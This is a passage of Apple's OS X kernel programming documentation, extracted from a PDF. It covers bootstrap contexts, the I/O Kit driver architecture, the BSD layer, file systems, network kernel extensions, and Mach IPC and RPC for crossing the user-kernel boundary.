daemons, they can modify the startup scripts to start the application. On restart, the application will be started in the startup context. This is not very practical if the computer in question isin heavy use, however. Fortunately, there are other waysto startservices in a startup context. The second way to run a service in the startup context is to use ssh to connect to the computer. Since sshd is running in the startup context, programs started from an ssh session also register themselves in the startup context. (Note that a user can safely kill the main sshd process without being logged out. The user just needs to be careful to kill the right one.) The third way isto log in asthe console user (>console), which causes LoginWindow to exit and causes init to spawn a getty process on the console. Since init spawns getty, which spawns login, which spawns the user’s shell, any programs started from the text console will be in the startup context. Bootstrap Contexts How Contexts Affect Users 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 92More generally, any process that is the child of a process in the startup context (other than those inherited by init because their parent process exited) is automatically in the startup context. Any process that is the child of a process in the login context is, itself, in the login context. This means that daemons can safely fork children at any time and those children will be in the startup context, as will programs started from the console (not the Console application). This also meansthat any program started by a user in a terminal window, from Finder, from the Dock, and so on, will be in the currently logged in user’s login context, even if that user runs the application using su or sudo. How Contexts Affect Developers If you are writing only kernel code, contexts are largely irrelevant (unless you are creating a new context, of course). However, kernel developers frequently need to write a program that registers itself in the startup context in order to provide some level of driver communication. For example, you could write a user-space daemon that brokers configuration information for a sound driver based on which user is logged in at the time. In the most general case, the problem ofstarting an application in the startup context can be solved by creating a startup script for your daemon, which causesit to be run in the startup context after the next reboot. However, users generally do not appreciate having to reboot their computers to install a new driver. Asking the user to connect to his or her own computer with ssh to execute a script is probably not reasonable, either. The biggest problem with forcing a reboot, of course, is that users often install several programs at once. Rebooting between each install inconveniences the end user, and has no other benefit. For that reason, you should not force the user to restart. Instead, you should offer the user the option, noting that the software may not work correctly until the user restarts. While this does not solve the fundamental problem, it does at least minimize the most common source of complaints. There are a number of ways to force a program to start in the startup context without rebooting or using ssh. However, these are not robust solutions, and are not recommended. A standard API for starting daemons is under consideration. When an official API becomes available, this chapter will be updated to discuss it. Bootstrap Contexts How Contexts Affect Developers 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 93Those of you who are already familiar with writing device drivers for Mac OS 9 or for BSD will discover that writing driversfor OS X requiressome new ways of thinking. In creating OS X, Apple has completely redesigned the Macintosh I/O architecture, providing a framework for simplified driver development that supports many categories of devices. This framework is called the I/O Kit. From a programming perspective, the I/O Kit provides an abstract view of the system hardware to the upper layers of OS X. The I/O Kit uses an object-oriented programming model, implemented in a restricted subset of C++ to promote increased code reuse. By starting with properly designed base classes, you gain a head start in writing a new driver; with much of the driver code already written, you need only to fill in the specific code that makes your driver different. For example, all SCSI controllers deliver a fairly standard set of commands to a device, but do so via different low-level mechanisms. By properly using object-oriented programming methodology, a SCSI driver can implement those low-level transport portions without reimplementing the higher level SCSI protocol code. Similar opportunities for code reuse can be found in most types of drivers. Part of the philosophy of the I/O Kit is to make the design completely open. Rather than hiding parts of the API in an attempt to protect developers from themselves, all of the I/O Kit source is available as part of Darwin. You can use the source code as an aid to designing (and debugging) new drivers. Instead of hiding the interfaces, Apple’s designers have chosen to lead by example. Sample code and classes show the recommended (easy) way to write a driver. However, you are not prevented from doing things the hard way (or the wrong way). Instead, attention has been concentrated on making the “best” ways easy to follow. Redesigning the I/O Model You might ask why Apple chose to redesign the I/O model. At first glance, it mightseem that reusing the model from Mac OS 9 or FreeBSD would have been an easier choice. There are several reasons for the decision, however. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 94 I/O Kit OverviewNeither the Mac OS 9 driver model nor the FreeBSD model offered a feature set rich enough to meet the needs of OS X. The underlying operating-system technology of OS X is very different from that of Mac OS 9. The OS X kernel is significantly more advanced than the previous Mac OS system architecture; OS X needs to handle memory protection, preemption, multiprocessing, and other features not present (orsubstantially less pervasive) in previous versions of the Mac OS. Although FreeBSD supports these features, the BSD driver model did not offer the automatic configuration, stacking, power management, or dynamic device-loading features required in a modern, consumer-oriented operating system. By redesigning the I/O architecture, Apple’s engineers can take best advantage of the operating-system features in OS X. For example, virtual memory (VM) is not a fundamental part of the operating system in Mac OS 9. Thus, every driver writer must know about (and write for) VM. This has presented certain complications for developers. In contrast, OS X has simplified driver interaction with VM. VM capability is inherent in the OS X operating system and cannot be turned off by the user. Thus, VM capabilities can be abstracted into the I/O Kit, and the code for handling VM need not be written for every driver. OS X offers an unprecedented opportunity to reuse code. In Mac OS 9, for example, all software development kits (SDKs) were independent of each other, duplicating functionality between them. In OS X, the I/O Kit is delivered as part of the basic developer tools, and code is shared among its various parts. In contrast with traditional I/O models, the reusable code model provided by the I/O Kit can decrease your development work substantially. In porting drivers from Mac OS 9, for example, the OS X counterparts have been up to 75% smaller. In general, all hardware support is provided directly by I/O Kit entities. One exception to this rule is imaging devicessuch as printers,scanners, and digital cameras(although these do make some use of I/O Kit functionality). Specifically, although communication with these devices is handled by the I/O Kit (for instance, under the FireWire or USB families), support for particular device characteristics is handled by user-space code (see “For More Information” (page 100) for further discussion). If you need to support imaging devices, you should employ the appropriate imaging software development kit (SDK). The I/O Kit attempts to represent, in software, the same hierarchy that exists in hardware. Some things are difficult to abstract, however. When the hardware hierarchy is difficult to represent (for example, if layering violations occur), then the I/O Kit abstractions provide less help for writing drivers. In addition, all drivers exist to drive hardware; all hardware is different. Even with the reusable model provided by the I/O Kit, you still need to be aware of any hardware quirks that may impact a higher-level view of the device. The code to support those quirks still needs to be unique from driver to driver. I/O Kit Overview Redesigning the I/O Model 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 95Although most developers should be able to take full advantage of I/O Kit device families (see “Families” (page 96)), there will occasionally be some who cannot. Even those developers should be able to make use of parts of the I/O Kit, however. In any case, the source code is always available. You can replace functionality and modify the classes yourself if you need to do so. In designing the I/O Kit, one goal has been to make developers’ lives easier. Unfortunately, it is not possible to make all developers’ lives uniformly easy. Therefore, a second goal of the I/O Kit design is to meet the needs of the majority of developers, without getting in the way of the minority who need lower level access to the hardware. I/O Kit Architecture The I/O Kit provides a model of system hardware in an object-oriented framework. Each type of service or device is represented by a C++ class; each discrete service or device is represented by an instance (object) of that class. There are three major conceptual elements of the I/O Kit architecture: ● “Families” (page 96) ● “Drivers” (page 97) ● “Nubs” (page 97) Families A family defines a collection of high-level abstractions common to all devices of a particular category that takes the form of C code and C++ classes. Families may include headers, libraries, sample code, test harnesses, and documentation. They provide the API, generic support code, and at least one example driver (in the documentation). Families provide services for many different categories of devices. For example, there are protocol families (such as SCSI, USB, and FireWire), storage families (disk), network families, and families to describe human interface devices (mouse and keyboard). When devices have features in common, the software that supports those features is most likely found in a family. Common abstractions are defined and implemented by the family, allowing all drivers in a family to share similar features easily. For example, all SCSI controllers have certain things they must do, such as scanning the SCSI bus. The SCSI family defines and implementsthe functionality that is common to SCSI controllers. Because thisfunctionality has been included in the SCSI family, you do not need to include scanning code (for example) in your new SCSI controller driver. I/O Kit Overview I/O Kit Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 96Instead, you can concentrate on device-specific details that make your driver different from other SCSI drivers. The use of families means there is less code for you to write. Families are dynamically loadable; they are loaded when needed and unloaded when no longer needed. Although some common families may be preloaded at system startup, all families should be considered to be dynamically loadable (and, therefore, potentially unloaded). See the “Connection Example” (page 98) for an illustration. Drivers A driver is an I/O Kit object that manages a specific device or bus, presenting a more abstract view of that device to other parts of the system. When a driver is loaded, its required families are also loaded to provide necessary, common functionality. The request to load a driver causes all of its dependent requirements (and their requirements) to be loaded first. After all requirements are met, the requested driver is loaded as well. See “Connection Example” (page 98) for an illustration. Note that families are loaded upon demand of the driver, not the other way around. Occasionally, a family may already be loaded when a driver demands it; however, you should never assume this. To ensure that all requirements are met, each device driver should list all of its requirements in its property list. Most drivers are in a client-provider relationship, wherein the driver must know about both the family from which it inherits and the family to which it connects. A SCSI controller driver, for example, must be able to communicate with both the SCSI family and the PCI family (as a client of PCI and provider of SCSI). A SCSI disk driver communicates with both the SCSI and storage families. Nubs A nub is an I/O Kit object that represents a point of connection for a driver. It represents a controllable entity such as a disk or a bus. A nub is loaded as part of the family that instantiates it. Each nub provides access to the device or service that it represents and provides services such as matching, arbitration, and power management. The concept of nubs can be more easily visualized by imagining a TV set. There is a wire attached to your wall that provides TV service from somewhere. For all practical purposes, it is permanently associated with that provider, the instantiating class (the cable company who installed the line). It can be attached to the TV to provide a service (cable TV). That wire is a nub. Each nub provides a bridge between two drivers (and, by extension, between two families). It is most common that a driver publishes one nub for each individual device or service it controls. (In this example, imagine one wire for every home serviced by the cable company.) I/O Kit Overview I/O Kit Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 97It is also possible for a driver that controls only a single device or service to act as its own nub. (Imagine the antenna on the back of your TV that has a built-in wire.) See the “Connection Example” (page 98) for an illustration of the relationship between nubs and drivers. Connection Example Figure 12-1 (page 98) illustrates the I/O Kit architecture, using several example drivers and their corresponding nubs. Note that many different driver combinations are possible; this diagram shows only one possibility. In this case, a SCSI stack is shown, with a PCI controller, a disk, and a SCSI scanner. The SCSI disk is controlled by a kernel-resident driver. The SCSI scanner is controlled by a driver that is part of a user application. Figure 12-1 I/O Kit architecture IOPCIBridge family PCI bus driver IOSCSIParallelController family SCSI card driver IOBlockStorageDriver family SCSI disk driver IOPCIDevice nubs IOSCSIParallelDevice nubs IOMedia nub Disk User application User space Kernel space Device interface User client This example illustrates how a SCSI disk driver (Storage family) is connected to the PCI bus. The connection is made in several steps. I/O Kit Overview I/O Kit Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 981. The PCI bus driver discovers a PCI device and announces its presence by creating a nub (IOPCIDevice). The nub’s class is defined by the PCI family. IOPCIBridge family PCI bus driver IOPCIDevice nubs Video card Main logic board ATA SCSI card 2. The bus driver identifies (matches) the correct device driver and requests that the driver be loaded. At the end of this matching process, a SCSI controller driver has been found and loaded. Loading the controller driver causes all required families to be loaded as well. In this case, the SCSI family is loaded; the PCI family (also required) is already present. The SCSI controller driver is given a reference to the IOPCIDevice nub. 3. The SCSI controller driver scans the SCSI bus for devices. Upon finding a device, it announces the presence of the device by creating a nub (IOSCSIDevice). The class of this nub is defined by the SCSI family. IOPCIBridge family PCI bus driver IOSCSIParallelController family SCSI card driver IOPCIDevice nubs IOSCSIParallelDevice nubs SCSI disk Unknown device SCSI scanner 1 5 6 I/O Kit Overview I/O Kit Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 994. The controller driver identifies (matches) the correct device driver and requests that the driver be loaded. At the end of this matching process, a disk driver has been found and loaded. Loading the disk driver causes all required families to be loaded as well. In this case, the Storage family is loaded; the SCSI family (also required) is already present. The disk driver is given a reference to the IOSCSIDevice nub. IOPCIBridge family PCI bus driver IOSCSIParallelController family SCSI card driver IOBlockStorageDriver family SCSI disk driver IOPCIDevice nubs IOSCSIParallelDevice nubs IOMedia nub Disk For More Information For more information on the I/O Kit, you should read the document I/O Kit Fundamentals, available from Apple’s developer documentation website, http://developer.apple.com/documentation. It provides a good general overview of the I/O Kit. In addition to I/O Kit Fundamentals, the website contains a number of HOWTO documents and topic-specific documents that describe issues specific to particular technology areas such as FireWire and USB. I/O Kit Overview For More Information 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 100The BSD portion of the OS X kernel is derived primarily from FreeBSD, a version of 4.4BSD that offers advanced networking, performance, security, and compatibility features. BSD variants in general are derived (sometimes indirectly) from 4.4BSD-Lite Release 2 from the Computer Systems Research Group (CSRG) at the University of California at Berkeley. BSD provides many advanced features, including the following: ● Preemptive multitasking with dynamic priority adjustment. Smooth and fair sharing of the computer between applications and users is ensured, even under the heaviest of loads. ● Multiuser access. Many people can use an OS X system simultaneously for a variety of things. This means, for example, thatsystem peripheralssuch as printers and disk drives are properly shared between all users on the system or the network and that individual resource limits can be placed on users or groups of users, protecting critical system resources from overuse. ● Strong TCP/IP networking with support for industry standards such as SLIP, PPP, and NFS. OS X can interoperate easily with other systems as well as act as an enterprise server, providing vital functions such as NFS (remote file access) and email services, or Internet services such as HTTP, FTP, routing, and firewall (security) services. ● Memory protection. Applications cannot interfere with each other. One application crashing does not affect others in any way. ● Virtual memory and dynamic memory allocation. Applications with large appetitesfor memory are satisfied while still maintaining interactive response to users. With the virtual memory system in OS X, each application has access to its own 4 GB memory address space; this should satisfy even the most memory-hungry applications. ● Support for kernel threads based on Mach threads. User-level threading packages are implemented on top of kernel threads. Each kernel thread is an independently scheduled entity. When a thread from a user process blocks in a system call, other threads from the same process can continue to execute on that or other processors. By default, a process in the conventional sense has one thread, the main thread. A user process can use the POSIX thread API to create other user threads. ● SMP support. Support is included for computers with multiple CPUs. ● Source code. Developers gain the greatest degree of control over the BSD programming environment because source is included. ● Many of the POSIX APIs. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 101 BSD OverviewBSD Facilities The facilities that are available to a user process are logically divided into two parts: kernel facilities and system facilities implemented by or in cooperation with a server process. The facilities implemented in the kernel define the virtual machine in which each process runs. Like many real machines, this virtual machine has memory management, an interrupt facility, timers, and counters. The virtual machine also allows access to files and other objects through a set of descriptors. Each descriptor resembles a device controller and supports a set of operations. Like devices on real machines, some of which are internal to the machine and some of which are external, parts of the descriptor machinery are built into the operating system, while other parts are often implemented in server processes. The BSD component provides the following kernel facilities: ● processes and protection ● host and process identifiers ● process creation and termination ● user and group IDs ● process groups ● memory management ● text, data, stack, and dynamic shared libraries ● mapping pages ● page protection control ● POSIX synchronization primitives ● POSIX shared memory ● signals ● signal types ● signal handlers ● sending signals ● timing and statistics ● real time ● interval time ● descriptors ● files ● pipes BSD Overview BSD Facilities 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 102● sockets ● resource controls ● process priorities ● resource utilization and resource limits ● quotas ● system operation support ● bootstrap operations ● shut-down operations ● accounting BSD system facilities (facilities that may interact with user space) include ● generic input/output operations such as read and write, nonblocking, and asynchronous operations ● file-system operations ● interprocess communication ● handling of terminals and other devices ● process control ● networking operations Differences between OS X and BSD Although the BSD portion of OS X is primarily derived from FreeBSD, some changes have been made: ● The sbrk() system call for memory management is deprecated. Its use is not recommended in OS X. ● The OS X runtime model uses a different object file format for executables and shared objects, and a different mechanism for executing some of those executables. The primary native format is Mach-O. This format is supported by the dynamic link editor (dyld). The PEF binary file format is supported by the Code Fragment Manager (CFM). The kernel supports execve() with Mach-O binaries. Mapping and management of Mach-O dynamic shared libraries, as well as launching of PEF-based applications, are performed by user-space code. ● OS X does not support memory-mapped devices through the mmap() function. (Graphic device support and other subsystems provide similar functionality, but using different APIs.) In OS X, this interface should be done through user clients. See the Apple I/O Kit documents for additional information. ● The swapon() call is not supported; macx_swapon() is the equivalent call from the Mach pager. BSD Overview Differences between OS X and BSD 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 103● The Unified Buffer Cache implementation in OS X differs from that found in FreeBSD. ● Mach provides a number of IPC primitives that are not traditionally found in UNIX. See “Boundary Crossings” (page 109) for more information on Mach IPC. Some System V primitives are supported, but their use is discouraged in favor of POSIX equivalents. ● Several changes have been made to the BSD security model to support single-user and multiple-administrator configurations, including the ability to disable ownership and permissions on a volume-by-volume basis. ● The locking mechanism used throughout the kernel differs substantially from the mechanism used in FreeBSD. ● The kernel extension mechanism used by OS X is completely different. The OS X driver layer, the I/O Kit, is an object-oriented driver stack written in C++. The general kernel programming interfaces, or KPIs, are used to write non-driver kernel extensions. These mechanisms are described more in “I/O Kit Overview” (page 94) and KPI Reference , respectively. In addition, several new features have been added that are specific to the OS X (Darwin) implementation of BSD. These features are not found in FreeBSD. ● enhancements to file-system buffer cache and file I/O clustering ● adaptive and speculative read ahead ● user-process controlled read ahead ● time aging of the file-system buffer cache ● enhancements to file-system support ● implementation of Apple extensions for ISO-9660 file systems ● multithreaded asynchronous I/O for NFS ● addition of system calls to support semantics of Mac OS Extended (HFS+) file systems ● additions to naming conventions for pathnames, as required for accessing multiple forks in Mac OS Extended file systems For Further Reading The BSD component of the OS X kernel is complex. A complete description is beyond the scope of this document. However, many excellent references exist for this component. If you are interested in BSD, be sure to refer to the bibliography for further information. BSD Overview For Further Reading 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 104Although the BSD layer of OS X is derived from 4.4BSD, keep in mind that it is not identical to 4.4BSD. Some functionality of 4.4 BSD has not been included in OS X. Some new functionality has been added. The cited reference materials are recommended for additional reading. However, they should not be presumed as forming a definitive description of OS X. BSD Overview For Further Reading 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 105OS X provides“out-of-the-box”support forseveral different file systems. These include Mac OS Extended format (HFS+), the BSD standard file system format (UFS), NFS (an industry standard for networked file systems), ISO 9660 (used for CD-ROM), MS-DOS, SMB (Windows file sharing standard), AFP (Mac OS file sharing), and UDF. Support is also included for reading the older, Mac OS Standard format (HFS) file-system type; however, you should not plan to format new volumes using Mac OS Standard format. OS X cannot boot from these file systems, nor does the Mac OS Standard format provide some of the information required by OS X. The Mac OS Extended format provides many of the same characteristics as Mac OS Standard format but adds additional support for modern features such as file permissions, longer filenames, Unicode, both hard and symbolic links, and larger disk sizes. UFS provides case sensitivity and other characteristics that may be expected by BSD commands. In contrast, Mac OS Extended Format is not case-sensitive (but is case-preserving). OS X currently can boot and “root” from an HFS+, UFS, ISO, NFS, or UDF volume. That is, OS X can boot from and mount a volume of any of these types and use it as the primary, or root, file system. Other file systems can also be mounted, allowing usersto gain accessto additional volume formats and features. NFS provides access to network servers as if they were locally mounted file systems. The Carbon application environment mimics many expected behaviors of Mac OS Extended format on top of both UFS and NFS. These include such characteristics as Finder Info, file ID access, and aliases. By using the OS X Virtual File System (VFS) capability and writing kernel extensions, you can add support for other file systems. Examples of file systems that are not currently supported in OS X but that you may wish to add to the system include the Andrew file system (AFS) and the Reiser file system (ReiserFS). If you want to support a new volume format or networking protocol, you’ll need to write a file-system kernel extension. Working With the File System In OS X, the vnode structure providesthe internal representation of a file or directory (folder). There is a unique vnode allocated for each active file or folder, including the root. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 106 File Systems OverviewWithin a file system, operations on specific files and directories are implemented via vnodes and VOP (vnode operation) calls. VOP calls are used for operations on individual files or directories (such as open, close, read, or write). Examples include VOP_OPEN to open a file and VOP_READ to read file contents. In contrast, file-system–wide operations are implemented using VFS calls. VFS calls are primarily used for operations on entire file systems; examples include VFS_MOUNT and VFS_UNMOUNT to mount or unmount a file system, respectively. File-system writers need to provide stubs for each of these sets of calls. VFS Transition The details of the VFS subsystem in OS X are in the process of changing in order to make the VFS interface sustainable. If you are writing a leaf file system, these changes will still affect you in many ways. please contact Apple Developer Support for more information. File Systems Overview VFS Transition 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 107OS X kernel extensions (KEXTs) provide mechanisms to extend and modify the networking infrastructure of OS X dynamically, without recompiling or relinking the kernel. The effect is immediate and does not require rebooting the system. Networking KEXTs can be used to ● monitor network traffic ● modify network traffic ● receive notification of asynchronous events from the driver layer In the last case, such events are received by the data link and network layers. Examples of these events include power management events and interface status changes. Specifically, KEXTs allow you to ● create protocol stacks that can be loaded and unloaded dynamically and configured automatically ● create modulesthat can be loaded and unloaded dynamically atspecific positionsin the network hierarchy. The Kernel Extension Manager dynamically adds KEXTs to the running OS X kernel inside the kernel’s address space. An installed and enabled network-related KEXT is invoked automatically, depending on its position in the sequence of protocol components, to process an incoming or outgoing packet. All KEXTs provide initialization and termination routines that the Kernel Extension Manager invokes when it loads or unloads the KEXT. The initialization routine handles any operations that are needed to complete the incorporation of the KEXT into the kernel, such as updating protosw and domain structures (through programmatic interfaces). Similarly, the termination routine must remove references to the NKE from these structures to unload itself successfully. NKEs must provide a mechanism, such as a reference count, to ensure that the NKE can terminate without leaving dangling pointers. For additional information on the networking portions of the OS X kernel, you should read the document Network Kernel Extensions Programming Guide . 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 108 Network ArchitectureTwo applications can communicate in a number of ways—for example, by using pipes or sockets. The applicationsthemselves are unaware of the underlying mechanismsthat provide this communication. However this communication occurs by sending data from one program into the kernel, which then sends the data to the second program. As a kernel programmer, it is your job to create the underlying mechanisms responsible for communication between your kernel code and applications. This communication is known as crossing the user-kernel boundary. This chapter explains various ways of crossing that boundary. In a protected memory environment, each process is given its own address space. This means that no program can modify another program’s data unless that data also resides in its own memory space (shared memory). The same applies to the kernel. It resides in its own address space. When a program communicates with the kernel, data cannot simply be passed from one address space to the other as you might between threads (or between programs in environments like Mac OS 9 and most real-time operating systems, which do not have protected memory). We refer to the kernel’s address space as kernel space, and collectively refer to applications’ address spaces as user space. For this reason, applications are also commonly referred to as user-space programs, or user programs for short. When the kernel needs a small amount of data from an application, the kernel cannot just dereference a pointer passed in from that application, since that pointer is relative to the application’s address space. Instead, the kernel generally copies that information into storage within its own address space. When a large region of data needs to be moved, it may map entire pages into kernel space for efficiency. The same behavior can be seen in reverse when moving data from the kernel to an application. Because it is difficult to move data back and forth between the kernel and an application, this separation is called a boundary. It isinherently time consuming to copy data, even if that data isjust the user-space address of a shared region. Thus, there is a performance penalty whenever a data exchange occurs. If this penalty is a serious problem, it may affect which method you choose for crossing the user-kernel boundary. Also, by trying to minimize the number of boundary crossings, you may find ways to improve the overall design of your code. This is particularly significant if your code is involved in communication between two applications, since the user-kernel boundary must be crossed twice in that case. There are a number of ways to cross the user-kernel boundary. Some of them are covered in this chapter in the following sections: 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 109 Boundary Crossings● “Mach Messaging and Mach Interprocess Communication (IPC)” (page 112) ● “BSD syscall API ” (page 116) ● “BSD ioctl API” (page 116) ● “BSD sysctl API ” (page 117) ● “Memory Mapping and Block Copying” (page 125) In addition, the I/O Kit uses the user-client/device-interface API for most communication. Because that API is specific to the I/O Kit, it is not covered in this chapter. The user client API is covered in I/O Kit Fundamentals, Accessing Hardware From Applications, and I/O Kit Device Driver Design Guidelines. The ioctl API is also specific to the construction of device drivers, and is largely beyond the scope of this document. However, since ioctl is a BSD API, it is covered at a glance for your convenience. This chapter covers one subset of Mach IPC—the Mach remote procedure call (RPC) API. It also covers the syscall, sysctl, memory mapping, and block copying APIs. Security Considerations Crossing the user-kernel boundary represents a security risk if the kernel code operates on the data in any substantial way (beyond writing it to disk or passing it to another application). You must carefully perform bounds checking on any data passed in, and you must also make sure your code does not dereference memory that no longer belongs to the client application. Also, under no circumstances should you run unverified program code passed in from user space within the kernel. See “Security Considerations” (page 24) for further information. Choosing a Boundary Crossing Method The first step in setting up user-kernel data exchange is choosing a means to do that exchange. First, you must consider the purpose for the communication. Some crucial factors are latency, bandwidth, and the kernel subsystem involved. Before choosing a method of communication, however, you should first understand at a high-level each of these forms of communication. Mach messaging and Mach interprocess communication (IPC) are relatively low-level ways of communicating between two Mach tasks (processes), as well as between a Mach task and the kernel. These form the basis for most communication outside of BSD and the I/O Kit. The Mach remote procedure call (RPC) API is a high level procedural abstraction built on top of Mach IPC. Mach RPC is the most common use of IPC. Boundary Crossings Security Considerations 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 110The BSD syscall API is an API for calling kernel functions from user space. It is used extensively when writing file systems and networking protocols, in ways that are very subsystem-dependent. Developers are strongly discouraged from using the syscall API outside of file-system and network extensions, as no plug-in API exists for registering a new system call with the syscall mechanism. The BSD sysctl API (in its revised form) supersedes the syscall API and also provides a relatively painless way to change individual kernel variablesfrom userspace. It has a straightforward plug-in architecture, making it a good choice where possible. Memory mapping and block copying are used in conjunction with one of the other APIs mentioned, and provide ways of moving large amounts of data (more than a few bytes) or variably sized data to and from kernel space. Kernel Subsystems The choice of boundary crossing methods depends largely on the part of the kernel into which you are adding code. In particular, the boundary crossing method preferred for the I/O Kit is different from that preferred for BSD, which is different from that preferred for Mach. If you are writing a device driver or other related code, you are probably dealing with the I/O Kit. In that case, you should instead read appropriate sections in I/O Kit Fundamentals, Accessing Hardware From Applications, and I/O Kit Device Driver Design Guidelines. If you are writing code that resides in the BSD subsystem (for example, a file system), you should generally use BSD APIs such as syscall or sysctl unless you require high bandwidth or exceptionally low latency. If you are writing code that resides anywhere else, you will probably have to use Mach messaging. Bandwidth and Latency The guidelines in the previous section apply to most communication between applications and kernel code. The methods mentioned, however, are somewhat lacking where high bandwidth or low latency are concerns. If you require high bandwidth, but latency is not an issue, you should probably consider doing memory-mapped communication. For large messagesthisis handled somewhat transparently by Mach RPC, making it a reasonable choice. For BSD portions of the kernel, however, you must explicitly pass pointers and use copyin and copyout to move large quantities of data. Thisis discussed in more detail in “Memory Mapping and Block Copying” (page 125). Boundary Crossings Choosing a Boundary Crossing Method 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 111If you require low latency but bandwidth is not an issue, sysctl and syscall are not good choices. Mach RPC, however, may be an acceptable solution. Another possibility is to actually wire a page of memory (see “Memory Mapping and Block Copying” (page 125) for details),start an asynchronous Mach RPC simpleroutine (to process the data), and use either locks or high/low water marks (buffer fullness) to determine when to read and write data. This can work for high-bandwidth communication as well. If you require both high bandwidth and low latency, you should also look at the user client/device interface model used in the I/O Kit, since that model has similar requirements. Mach Messaging and Mach Interprocess Communication (IPC) Mach IPC and Mach messaging are the basis for much of the communication in OS X. In many cases, however, these facilities are used indirectly by services implemented on top of one of them. Mach messaging and IPC are fundamentally similar except that Mach messaging is stateless, which prevents certain types of error recovery, as explained later. Except where explicitly stated, this section treats the two as equivalent. The fundamental unit of Mach IPC isthe port. The concept of Mach ports can be difficult to explain in isolation, so instead this section assumes a passing knowledge of a similar concept, that of ports in TCP/IP. In TCP/IP, a server listens for incoming connections over a network on a particular port. Multiple clients can connect to the port and send and receive data in word-sized or multiple-word–sized blocks. However, only one server process can be bound to the port at a time. In Mach IPC, the concept is the same, but the players are different. Instead of multiple hosts connecting to a TCP/IP port, you have multiple Mach tasks on the same computer connecting to a Mach port. Instead of firewall rules on a port, you have port rights that specify what tasks can send data to a particular Mach port. Also, TCP/IP ports are bidirectional, while Mach ports are unidirectional, much like UNIX pipes. This means that when a Mach task connects to a port, it generally allocates a reply port and sends a message containing send rights to that reply port so that the receiving task can send messages back to the sending task. As with TCP/IP, multiple client tasks can open connections to a Mach port, but only one task can be listening on that port at a time. Unlike TCP/IP, however, the IPC mechanism itself provides an easy means for one task to hand off the right to listen to an arbitrary task. The term receive rights refers to a task’s ability to listen on a given port. Receive rights can be sent from task to task in a Mach message. In the case of Mach IPC (but not Mach messaging), receive rights can even be configured to automatically return to the original task if the new task crashes or becomes unreachable (for example, if the new task isrunning on another computer and a router crashes). Boundary Crossings Mach Messaging and Mach Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 112In addition to specifying receive rights, Mach ports can specify which tasks have the right to send data. A task with send rights may be able to send once, or may be able to arbitrarily send data to a given port, depending on the nature of the rights. Using Well-Defined Ports Before you can use Mach IPC for task communication, the sending task must be able to obtain send rights on the receiving task’s task port. Historically, there are several ways of doing this, not all of which are supported by OS X. For example, in OS X, unlike most other Mach derivatives, there is no service server or name server. Instead, the bootstrap task and mach_init subsume this functionality. When a task is created, it is given send rights to a bootstrap port for sending messages to the bootstrap task. Normally a task would use this port to send a message that gives the bootstrap task send rights on another port so that the bootstrap task can then return data to the calling task. Various routines exist in bootstrap.h that abstract this process. Indeed, most users of Mach IPC or Mach messaging actually use Mach remote procedure calls (RPC), which are implemented on top of Mach IPC. Since direct use of IPC is rarely desirable (because it is not easy to do correctly), and because the underlying IPC implementation has historically changed on a regular basis, the details are not covered here. You can find more information on using Mach IPC directly in the Mach 3 Server Writer’s Guide from Silicomp (formerly the Open Group, formerly the Open Software Foundation Research Institute), which can be obtained from the developer section of Apple’s website. While much of the information contained in that book is not fully up-to-date with respect to OS X, it should still be a relatively good resource on using Mach IPC. Remote Procedure Calls (RPC) Mach RPC is the most common use for Mach IPC. It is frequently used for user-kernel communication, but can also be used for task to task or even computer-to-computer communication. Programmers frequently use Mach RPC for setting certain kernel parameters such as a given thread’s scheduling policy. RPC is convenient because it is relatively transparent to the programmer. Instead of writing long, complex functionsthat handle ports directly, you have only to write the function to be called and a small RPC definition to describe how to export the function as an RPC interface. After that, any application with appropriate permissions can call those functions as if they were local functions, and the compiler will convert them to RPC calls. In the directory osfmk/mach (relative to your checkout of the xnu module from CVS), there are a number of files ending in .defs; these files contain the RPC definitions. When the kernel (or a kernel module) is compiled, the Mach Interface Generator(MIG) usesthese definitionsto create IPC code to support the functions exported via RPC. Normally, if you want to add a new remote procedure call, you should do so by adding a definition to one of these existing files. (See “Building and Debugging Kernels” (page 155) for more information on obtaining kernel sources.) Boundary Crossings Mach Messaging and Mach Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 113What follows is an example of the definition for a routine, one of the more common uses of RPC. routine thread_policy_get( thread : thread_act_t; flavor : thread_policy_flavor_t; out policy_info : thread_policy_t, CountInOut; inout get_default : boolean_t); Notice the C-like syntax of the definition. Each parameter in the routine roughly maps onto a parameter in the C function. The C prototype for this function follows. kern_return_t thread_policy_get( thread_act_t act, thread_policy_flavor_t flavor, thread_policy_t policy_info, mach_msg_type_number_t *count, boolean_t get_default); The first two parameters are integers, and are passed as call-by-value. The third is a struct containing integers. It is an outgoing parameter, which means that the values stored in that variable will not be received by the function, but will be overwritten on return. Note: The parameters are all word-sized or multiples of the word size. Smaller data are impossible because of limitations inherent to the underlying Mach IPC mechanisms. From there it becomes more interesting. The fourth parameter in the C prototype is a representation of the size of the third. In the definition file, this is represented by an added option, CountInOut. The MIG option CountInOut specifies that there is to be an inout parameter called count. An inout parameter is one in which the original value can be read by the function being called, and its value is replaced on return from that function. Unlike a separate inout parameter, however, the value initially passed through this parameter is not directly set by the calling function. Instead, it is tied to the policy_info parameter so that the number of integers in policy_info is transparently passed in through this parameter. Boundary Crossings Mach 